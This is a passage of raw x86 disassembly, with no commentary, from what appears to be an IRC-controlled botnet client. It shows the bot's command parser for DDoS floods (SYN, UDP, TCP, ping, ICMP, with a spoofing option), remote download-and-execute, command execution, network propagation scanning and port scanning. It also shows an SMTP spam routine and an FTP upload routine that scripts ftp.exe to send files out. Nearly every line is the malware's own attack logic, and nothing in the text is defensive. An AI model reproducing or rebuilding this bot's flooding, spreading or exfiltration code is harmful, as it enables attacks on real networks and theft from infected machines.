call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413022
push [ebp+arg_8]
push offset aClone_ni ; "clone.ni"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_413022
push [ebp+arg_8]
push offset aClone_join ; "clone.join"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412FFC
push [ebp+arg_8]
push offset aClone_j ; "clone.j"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412FFC
push [ebp+arg_8]
push offset aClone_part ; "clone.part"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412F99
push [ebp+arg_8]
push offset aClone_p ; "clone.p"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412F99
push [ebp+arg_8]
push offset aIrc_repeat ; "irc.repeat"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412ED0
push [ebp+arg_8]
push offset aIrc_rp ; "irc.rp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412ED0
push [ebp+arg_8]
push offset aIrc_delay ; "irc.delay"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412E33
push [ebp+arg_8]
push offset aIrc_de ; "irc.de"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412E33
push [ebp+arg_8]
push offset aDownload_updat ; "download.update"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412CAF
push [ebp+arg_8]
push offset aDownload_up ; "download.up"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412CAF
push [ebp+arg_8]
push offset aCom_execute ; "com.execute"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412C1C
push [ebp+arg_8]
push offset aCom_e ; "com.e"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412C1C
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412B1B
push [ebp+arg_8]
push offset aFf ; "ff"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412B1B
push [ebp+arg_8]
push offset aCom_rename ; "com.rename"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412AC9
push [ebp+arg_8]
push offset aCom_mv ; "com.mv"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412AC9
push [ebp+arg_8]
push offset aDdos_icmp ; "ddos.icmp"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4129C8
push [ebp+arg_8]
push offset aDdos_ic ; "ddos.ic"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4129C8
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_40F239
push [ebp+arg_8]
push offset aClone_make ; "clone.make"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4128DD
push [ebp+arg_8]
push offset aClone_start ; "clone.start"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4128DD
push [ebp+arg_8]
push offset aDdos_syn ; "ddos.syn"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4127D8
push [ebp+arg_8]
push offset aDdos_ack ; "ddos.ack"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4127D8
push [ebp+arg_8]
push offset aDdos_random ; "ddos.random"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4127D8
push [ebp+arg_8]
push offset aDdos_synflood ; "ddos.synflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4126DA
push [ebp+arg_8]
push offset aDdos_synf ; "ddos.synf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4126DA
push [ebp+arg_8]
push offset aDownload_wget ; "download.wget"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412599
push [ebp+arg_8]
push offset aDownload_wg ; "download.wg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412599
push [ebp+arg_8]
push offset aDaemon_redirec ; "daemon.redirect"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41249C
push [ebp+arg_8]
push offset aDaemon_rd ; "daemon.rd"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_41249C
push [ebp+arg_8]
push offset aRoot_portscan ; "root.portscan"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4123A9
push [ebp+arg_8]
push offset aRoot_ps ; "root.ps"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4123A9
push [ebp+arg_8]
push offset aClone_privmsg ; "clone.privmsg"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4122D4
push [ebp+arg_8]
push offset aClone_pm ; "clone.pm"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4122D4
push [ebp+arg_8]
push offset aClone_action ; "clone.action"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4121BC
push [ebp+arg_8]
push offset aClone_ac ; "clone.ac"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4121BC
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_40F239
push [ebp+arg_8]
push offset aAdvscan ; "advscan"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411E65
push [ebp+arg_8]
push offset aAdv ; "adv"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411E65
push [ebp+arg_8]
push offset aDdos_udpflood ; "ddos.udpflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411D42
push [ebp+arg_8]
push offset aDdos_udpf ; "ddos.udpf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411D42
push [ebp+arg_8]
push offset aU_0 ; "u"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411D42
push [ebp+arg_8]
push offset aDdos_pingflood ; "ddos.pingflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411BFE
push [ebp+arg_8]
push offset aDdos_pingf ; "ddos.pingf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411BFE
push [ebp+arg_8]
push offset aP ; "p"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411BFE
push [ebp+arg_8]
push offset aDdos_tcpflood ; "ddos.tcpflood"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A65
push [ebp+arg_8]
push offset aDdos_tcpf ; "ddos.tcpf"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A65
push [ebp+arg_8]
push offset aUtil_email ; "util.email"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_41189C
lea eax, [ebp+var_3F8]
push edi
push eax
call sub_4179C0
push [ebp+arg_18]
call sub_41781F
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_DB0]
push eax
call sub_4179C0
push [ebp+arg_10]
lea eax, [ebp+var_BA8]
push eax
call sub_4179C0
push offset asc_42A3B4 ; " "
push offset a__1 ; "_"
push [ebp+esi+var_80]
call sub_40A7D7
push eax
lea eax, [ebp+var_55C]
push eax
call sub_4179C0
add esp, 30h
lea eax, [ebp+var_6EC]
push eax
push 101h
call ds:dword_43F5E0 ; WSAStartup
lea eax, [ebp+var_3F8]
push eax
call ds:dword_43F6EC ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call ds:dword_43F6E8 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_2EC], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_2E8], eax
call ds:dword_43F668 ; htons
mov [ebp+var_2EA], ax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_BA8]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_15B0]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_4172AE
add esp, 1Ch
lea eax, [ebp+var_2EC]
push 10h
push eax
push esi
call ds:dword_43F610 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call ds:dword_43F680 ; recv
lea eax, [ebp+var_CAC]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_15B0]
push eax
push esi
call ds:dword_43F6B8 ; send
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call ds:dword_43F680 ; recv
push esi
call ds:dword_43F700 ; closesocket
call ds:dword_43F5C8 ; WSACleanup
lea eax, [ebp+var_BA8]
push eax
push offset unk_4373F4
loc_411888: ; CODE XREF: sub_40EE72+3B51�j
; sub_40EE72+3E38�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
jmp loc_413A62
; ---------------------------------------------------------------------------
loc_41189C: ; CODE XREF: sub_40EE72+28C0�j
push [ebp+arg_8]
push offset aUtil_httpcon ; "util.httpcon"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A34
push [ebp+arg_8]
push offset aUtil_hcon ; "util.hcon"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_411A34
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz loc_40F239
push [ebp+arg_8]
push offset aFtp_upload ; "ftp.upload"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_414F45
push 4
push esi
call sub_40D000
pop ecx
test eax, eax
pop ecx
jnz short loc_411906
push esi
push offset dword_43739C
jmp loc_413BFB
; ---------------------------------------------------------------------------
loc_411906: ; CODE XREF: sub_40EE72+2A87�j
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
pop ecx
call sub_41730A
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_41730A
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_41730A
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_CB0]
push edx
push eax
lea eax, [ebp+var_BAC]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_4172AE
lea eax, [ebp+var_BAC]
push offset aAb ; "ab"
push eax
call sub_4179A8
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_40F239
push esi
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_417956
push [ebp+arg_24]
call sub_417900
add esp, 20h
lea eax, [ebp+var_BAC]
push eax
lea eax, [ebp+var_3F8]
push offset aSS_4 ; "-s:%s"
push eax
call sub_4172AE
add esp, 0Ch
lea eax, [ebp+var_3F8]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call ds:dword_43F5DC
test eax, eax
push edi
push esi
jz short loc_4119D3
push offset dword_437324
jmp short loc_4119D8
; ---------------------------------------------------------------------------
loc_4119D3: ; CODE XREF: sub_40EE72+2B58�j
push offset dword_4372E8
loc_4119D8: ; CODE XREF: sub_40EE72+2B5F�j
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_411A01
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_411A01: ; CODE XREF: sub_40EE72+2B71�j
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
loc_411A0D: ; CODE XREF: sub_40EE72+2BC0�j
lea eax, [ebp+var_BAC]
push 4
push eax
call sub_40D000
add esp, 0Ch
test eax, eax
jz loc_40F239
lea eax, [ebp+var_BAC]
push eax
call sub_419BBA
jmp short loc_411A0D
; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_40EE72+2A3B�j
; sub_40EE72+2A52�j
push [ebp+esi+var_80]
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
call sub_41781F
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_406AF8
loc_411A5D: ; CODE XREF: sub_40EE72+5878�j
add esp, 24h
jmp loc_414F45
; ---------------------------------------------------------------------------
loc_411A65: ; CODE XREF: sub_40EE72+2892�j
; sub_40EE72+28A9�j
mov esi, 80h
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_41782A
lea eax, [ebp+var_678]
push eax
push offset aSyn ; "syn"
call sub_4176D0
add esp, 14h
test eax, eax
jz short loc_411AC8
lea eax, [ebp+var_678]
push eax
push offset aAck ; "ack"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_411AC8
lea eax, [ebp+var_678]
push eax
push offset aRandom ; "random"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_411AC8
push offset dword_4372B0
jmp loc_4145FC
; ---------------------------------------------------------------------------
loc_411AC8: ; CODE XREF: sub_40EE72+2C1C�j
; sub_40EE72+2C33�j ...
push [ebp+arg_10]
call sub_41781F
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_411BF4
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_6F8]
push [ebp+arg_18]
push esi
push eax
call sub_41782A
push [ebp+arg_0]
call sub_41781F
mov [ebp+var_574], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41782A
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_56C], ebx
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_411B65
mov eax, offset aNormal ; "Normal"
loc_411B65: ; CODE XREF: sub_40EE72+2CEC�j
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push eax
push offset dword_43725C
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 0Ch
push eax
call sub_416D5A
add esp, 2Ch
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_401D82
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_411BE3
loc_411BCD: ; CODE XREF: sub_40EE72+2D6F�j
cmp [ebp+var_560], ebx
jnz loc_41460A
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_411BCD
; ---------------------------------------------------------------------------
loc_411BE3: ; CODE XREF: sub_40EE72+2D59�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_437214
jmp loc_413BFB
; ---------------------------------------------------------------------------
loc_411BF4: ; CODE XREF: sub_40EE72+2C67�j
push offset dword_4371CC
jmp loc_4145FC
; ---------------------------------------------------------------------------
loc_411BFE: ; CODE XREF: sub_40EE72+284D�j
; sub_40EE72+2864�j ...
cmp ds:dword_43F758, ebx
mov esi, [ebp+arg_4]
jnz loc_411D09
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_418C10
push [ebp+arg_18]
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41781F
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_41781F
push 7Fh
mov [ebp+var_310], eax
push [ebp+var_8C]
lea eax, [ebp+var_418]
push eax
call sub_418C10
add esp, 24h
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_310]
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset unk_437174
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 0Eh
push eax
call sub_416D5A
add esp, 24h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40AF86
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_411CF8
loc_411CE6: ; CODE XREF: sub_40EE72+2E84�j
cmp [ebp+var_2FC], ebx
jnz short loc_411D22
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_411CE6
; ---------------------------------------------------------------------------
loc_411CF8: ; CODE XREF: sub_40EE72+2E72�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_43712C
jmp loc_4128CC
; ---------------------------------------------------------------------------
loc_411D09: ; CODE XREF: sub_40EE72+2D95�j
push 1FFh
lea eax, [ebp+var_2DC]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_418C10
loc_411D1F: ; CODE XREF: sub_40EE72+3A66�j
add esp, 0Ch
loc_411D22: ; CODE XREF: sub_40EE72+2E7A�j
; sub_40EE72+2FD2�j ...
cmp [ebp+var_8], ebx
jnz loc_414E0F
push ebx
push [ebp+var_4]
loc_411D2F: ; CODE XREF: sub_40EE72+567C�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push esi
jmp loc_414627
; ---------------------------------------------------------------------------
loc_411D42: ; CODE XREF: sub_40EE72+2808�j
; sub_40EE72+281F�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_418C10
push [ebp+arg_18]
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41781F
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_41781F
mov esi, [ebp+esi+var_80]
add esp, 18h
cmp esi, ebx
mov [ebp+var_310], eax
jz short loc_411DA7
push esi
call sub_41781F
pop ecx
mov [ebp+var_30C], eax
jmp short loc_411DAD
; ---------------------------------------------------------------------------
loc_411DA7: ; CODE XREF: sub_40EE72+2F24�j
mov [ebp+var_30C], ebx
loc_411DAD: ; CODE XREF: sub_40EE72+2F33�j
push 7Fh
lea eax, [ebp+var_418]
push [ebp+var_8C]
push eax
call sub_418C10
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_310]
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset dword_4370BC
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 0Fh
push eax
call sub_416D5A
add esp, 24h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40B112
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_411E54
loc_411E3E: ; CODE XREF: sub_40EE72+2FE0�j
cmp [ebp+var_2FC], ebx
jnz loc_411D22
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_411E3E
; ---------------------------------------------------------------------------
loc_411E54: ; CODE XREF: sub_40EE72+2FCA�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_437074
jmp loc_4128CC
; ---------------------------------------------------------------------------
loc_411E65: ; CODE XREF: sub_40EE72+27DA�j
; sub_40EE72+27F1�j
push 8
call sub_416FA2
push [ebp+arg_18]
mov [ebp+arg_8], eax
call sub_41781F
add eax, [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 258h
jle short loc_411EB8
push [ebp+arg_8]
lea eax, [ebp+var_2DC]
push offset unk_437028
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 20h
jmp loc_414F45
; ---------------------------------------------------------------------------
loc_411EB8: ; CODE XREF: sub_40EE72+300F�j
push edi
call sub_41781F
push [ebp+arg_18]
mov [ebp+var_330], eax
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41781F
add esp, 0Ch
cmp eax, 2
mov [ebp+var_32C], eax
jnb short loc_411EF1
push 2
pop eax
mov [ebp+var_32C], eax
loc_411EF1: ; CODE XREF: sub_40EE72+3074�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_411EFE
mov [ebp+var_32C], ecx
loc_411EFE: ; CODE XREF: sub_40EE72+3084�j
push [ebp+arg_10]
call sub_41781F
cmp eax, 320h
pop ecx
mov [ebp+var_328], eax
jbe short loc_411F1E
mov [ebp+var_328], 320h
loc_411F1E: ; CODE XREF: sub_40EE72+30A0�j
or [ebp+var_314], 0FFFFFFFFh
cmp ds:dword_42ACB0, ebx
mov [ebp+arg_0], ebx
jz short loc_411F74
mov [ebp+arg_24], offset dword_42ACB0
loc_411F37: ; CODE XREF: sub_40EE72+30E4�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_411F5A
add [ebp+arg_24], 3Ch
inc [ebp+arg_0]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_411F37
jmp short loc_411F74
; ---------------------------------------------------------------------------
loc_411F5A: ; CODE XREF: sub_40EE72+30D6�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, ds:dword_42ACB0[ecx]
mov [ebp+var_330], ecx
loc_411F74: ; CODE XREF: sub_40EE72+30BC�j
; sub_40EE72+30E6�j
cmp [ebp+var_330], ebx
jz loc_414037
mov edi, [ebp+esi+var_80]
cmp edi, ebx
mov [ebp+arg_18], edi
jz short loc_411FBB
cmp byte ptr [edi], 23h
jz short loc_411FBB
push edi
lea eax, [ebp+var_444]
push 10h
push eax
call sub_41782A
push 78h
push edi
call sub_418F50
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_304], eax
jmp loc_41208F
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_40EE72+3117�j
; sub_40EE72+311C�j
cmp [ebp+var_9C7], bl
jnz short loc_411FDD
cmp [ebp+var_9C6], bl
jnz short loc_411FDD
cmp [ebp+var_9B6], bl
jnz short loc_411FDD
push offset unk_436FE4
jmp loc_4145FC
; ---------------------------------------------------------------------------
loc_411FDD: ; CODE XREF: sub_40EE72+314F�j
; sub_40EE72+3157�j ...
push 10h
lea eax, [ebp+arg_0]
pop edi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_0], edi
push [ebp+arg_4]
call ds:dword_43F60C ; getsockname
mov al, [ebp+var_9C7]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_418C10
add esp, 0Ch
cmp [ebp+var_9B6], bl
jz short loc_412089
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_418F10
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_41207D
loc_41205B: ; CODE XREF: sub_40EE72+3209�j
cmp eax, ebx
jz short loc_41207D
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_418F10
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_41205B
loc_41207D: ; CODE XREF: sub_40EE72+31E7�j
; sub_40EE72+31EB�j
mov [ebp+var_304], 1
jmp short loc_41208F
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_40EE72+31C1�j
mov [ebp+var_304], ebx
loc_41208F: ; CODE XREF: sub_40EE72+3144�j
; sub_40EE72+3215�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov [ebp+var_334], eax
mov eax, [ebp+var_4]
mov [ebp+var_30C], eax
mov eax, [ebp+var_8]
mov [ebp+var_308], eax
mov edi, 80h
lea eax, [ebp+var_434]
push edi
push eax
call sub_41782A
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_4120E0
loc_4120CD: ; CODE XREF: sub_40EE72+3291�j
push esi
loc_4120CE: ; CODE XREF: sub_40EE72+327B�j
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_41210B
; ---------------------------------------------------------------------------
loc_4120E0: ; CODE XREF: sub_40EE72+3259�j
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_4120EF
cmp byte ptr [eax], 23h
jnz short loc_4120EF
push eax
jmp short loc_4120CE
; ---------------------------------------------------------------------------
loc_4120EF: ; CODE XREF: sub_40EE72+3273�j
; sub_40EE72+3278�j
mov esi, offset aF ; "#f"
push offset byte_43C80C
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4120CD
mov [ebp+var_3B4], bl
loc_41210B: ; CODE XREF: sub_40EE72+326C�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_41211D
mov eax, offset aSequential ; "Sequential"
loc_41211D: ; CODE XREF: sub_40EE72+32A4�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_436F60
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416D5A
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_40797F
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4121AB
loc_412195: ; CODE XREF: sub_40EE72+3337�j
cmp [ebp+var_300], ebx
jnz loc_41460A
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_412195
; ---------------------------------------------------------------------------
loc_4121AB: ; CODE XREF: sub_40EE72+3321�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_436F18
jmp loc_413BFB
; ---------------------------------------------------------------------------
loc_4121BC: ; CODE XREF: sub_40EE72+279A�j
; sub_40EE72+27B1�j
push edi
call sub_41781F
imul eax, 234h
pop ecx
cmp ds:byte_4450D8[eax], bl
jz loc_414F45
cmp [ebp+var_C], ebx
jz loc_414F45
push [ebp+arg_18]
call sub_417AB0
push edi
mov esi, eax
call sub_417AB0
push [ebp+arg_8]
add esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_417880
add esp, 14h
mov esi, eax
lea eax, [ebp+var_2DC]
push esi
push offset dword_436F0C
push eax
call sub_4172AE
add esp, 0Ch
cmp esi, ebx
jz loc_414F45
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F45
push edi
call sub_41781F
cmp eax, 1F4h
pop ecx
jge loc_414F45
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call sub_40D679
push edi
call sub_41781F
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_444EC0[eax], 73h
jnz loc_414F45
push esi
push edi
call sub_41781F
imul eax, 234h
pop ecx
add eax, offset byte_4450D8
push eax
push [ebp+arg_18]
push offset aSSS_1 ; "[%s] * %s %s"
loc_4122A7: ; CODE XREF: sub_40EE72+3532�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 28h
jmp loc_414F45
; ---------------------------------------------------------------------------
loc_4122D4: ; CODE XREF: sub_40EE72+276C�j
; sub_40EE72+2783�j
push edi
call sub_41781F
imul eax, 234h
pop ecx
cmp ds:byte_4450D8[eax], bl
jz loc_414F45
cmp [ebp+var_C], ebx
jz loc_414F45
push [ebp+arg_18]
call sub_417AB0
push edi
mov esi, eax
call sub_417AB0
push [ebp+arg_8]
add esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_417880
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_414F45
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F45
push edi
call sub_41781F
cmp eax, 1F4h
pop ecx
jge loc_414F45
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call sub_40D679
push edi
call sub_41781F
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_444EC0[eax], 73h
jnz loc_414F45
push esi
push edi
call sub_41781F
imul eax, 234h
pop ecx
add eax, offset byte_4450D8
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
jmp loc_4122A7
; ---------------------------------------------------------------------------
loc_4123A9: ; CODE XREF: sub_40EE72+273E�j
; sub_40EE72+2755�j
push edi
call ds:dword_43F6A8 ; inet_addr
push [ebp+arg_18]
mov [ebp+var_474], eax
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_480], eax
call sub_41781F
